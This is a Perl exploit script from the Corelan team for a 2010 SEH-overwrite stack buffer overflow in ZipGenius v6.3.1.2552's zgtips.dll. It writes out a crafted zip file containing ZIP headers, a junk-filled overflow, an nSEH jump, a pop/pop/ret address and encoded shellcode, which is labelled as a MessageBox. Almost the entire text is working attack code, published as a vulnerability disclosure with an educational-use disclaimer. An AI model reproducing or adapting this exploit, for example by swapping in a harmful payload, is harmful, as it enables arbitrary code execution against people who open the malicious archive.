# Exploit Title : ZipGenius zgtips.dll Stack Buffer Overflow
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-029
# Date          : April 21st, 2010
# Author        : corelanc0d3r, mr_me and rick2600
# Bug found by  : rick2600
# Software Link : http://www.zipgenius.com/
# Version       : v6.3.1.2552
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH overwrite
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n";
print " [+] Exploit for ZipGenius v6.3.1.2552\n";
print " [+] Preparing payload...\n";

my $filename="zipgenius.zip";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .# file size: don't change
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f". # file size: don't change
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00". # 
"\x02\x10\x00\x00". # 
"\x00\x00";

# Corelan Team MessageBox 
my $shellcode =
"\x89\xe5\xdb\xd3\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x49\x4a\x4b\x4f\x6b\x4a\x79\x51\x64" .
"\x51\x34\x49\x64\x45\x61\x48\x52\x4d\x62\x50\x7a\x44\x71" .
"\x4b\x79\x45\x34\x4e\x6b\x44\x31\x46\x50\x4e\x6b\x44\x36" .
"\x46\x6c\x4e\x6b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x46\x68" .
"\x4e\x6b\x51\x6e\x45\x70\x4e\x6b\x44\x76\x45\x68\x42\x6f" .
"\x44\x58\x44\x35\x49\x63\x43\x69\x45\x51\x4b\x61\x49\x6f" .
"\x4d\x31\x45\x30\x4e\x6b\x50\x6c\x45\x74\x47\x54\x4c\x4b" .
"\x43\x75\x47\x4c\x4c\x4b\x46\x34\x45\x55\x44\x38\x47\x71" .
"\x49\x7a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x50\x5a\x45\x70" .
"\x43\x31\x4a\x4b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4c\x4b\x43\x31\x48\x6e\x50\x31\x49\x6f\x45\x61\x49\x50" .
"\x49\x6c\x4e\x4c\x4f\x74\x4f\x30\x50\x74\x44\x4a\x4a\x61" .
"\x48\x4f\x46\x6d\x43\x31\x4f\x37\x4b\x59\x4a\x51\x4b\x4f" .
"\x4b\x4f\x49\x6f\x45\x6b\x51\x6c\x46\x44\x44\x68\x44\x35" .
"\x49\x4e\x4e\x6b\x42\x7a\x51\x34\x43\x31\x4a\x4b\x45\x36" .
"\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x50\x5a\x47\x6c\x43\x31" .
"\x48\x6b\x4e\x6b\x46\x64\x4e\x6b\x47\x71\x4a\x48\x4f\x79" .
"\x50\x44\x46\x44\x45\x4c\x50\x61\x4a\x63\x4f\x42\x46\x68" .
"\x45\x79\x4a\x74\x4f\x79\x4d\x35\x4b\x39\x4b\x72\x42\x48" .
"\x4c\x4e\x42\x6e\x46\x6e\x48\x6c\x43\x62\x4d\x38\x4f\x6c" .
"\x4b\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4b\x52\x50\x73\x4e\x67\x45\x4c\x46\x44" .
"\x50\x52\x4b\x58\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4e\x69" .
"\x42\x65\x44\x48\x50\x68\x50\x6c\x42\x4c\x45\x70\x49\x6f" .
"\x45\x38\x44\x73\x46\x52\x46\x4e\x50\x64\x51\x78\x42\x55" .
"\x50\x73\x51\x75\x42\x52\x4c\x48\x51\x4c\x47\x54\x47\x7a" .
"\x4f\x79\x4b\x56\x42\x76\x4b\x4f\x42\x75\x43\x34\x4c\x49" .
"\x49\x52\x42\x70\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4d\x6c" .
"\x4f\x77\x45\x4c\x51\x34\x50\x52\x4a\x48\x51\x4e\x4b\x4f" .
"\x4b\x4f\x4b\x4f\x45\x38\x42\x78\x45\x70\x47\x50\x45\x70" .
"\x51\x78\x46\x34\x42\x45\x51\x71\x42\x4d\x45\x38\x42\x4c" .
"\x50\x61\x50\x6e\x45\x70\x43\x58\x50\x43\x50\x6f\x42\x52" .
"\x43\x55\x46\x51\x4b\x6b\x4f\x78\x51\x4c\x45\x74\x44\x4c" .
"\x4c\x49\x49\x73\x43\x58\x46\x38\x47\x50\x45\x70\x47\x50" .
"\x43\x58\x44\x34\x43\x59\x42\x4f\x50\x6e\x51\x78\x43\x48" .
"\x50\x65\x43\x53\x51\x65\x45\x38\x50\x64\x45\x35\x45\x70" .
"\x50\x45\x50\x68\x50\x6f\x47\x50\x47\x33\x50\x6f\x43\x58" .
"\x50\x6c\x45\x35\x51\x30\x43\x44\x51\x78\x42\x45\x50\x72" .
"\x45\x31\x50\x62\x43\x58\x50\x56\x44\x35\x42\x4c\x42\x4e" .
"\x45\x61\x49\x59\x4d\x58\x42\x6c\x51\x34\x45\x4c\x4b\x39" .
"\x48\x61\x50\x31\x4b\x62\x43\x62\x51\x43\x46\x31\x46\x32" .
"\x49\x6f\x4e\x30\x46\x51\x4b\x70\x42\x70\x49\x6f\x42\x75" .
"\x46\x68\x44\x4a\x41\x41";



# --- payload ---
my $size=4064;
my $junk = "A" x 1060;
my $nseh="\xEB\x06\x90\x90";
my $seh=pack("V", 0x0295131C); # p/p/r UNIVERSAL
my $payload = $junk.$nseh.$seh.$shellcode;
my $rest = "D" x ($size - length($payload));
$payload = $payload . $rest. ".txt";    


print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);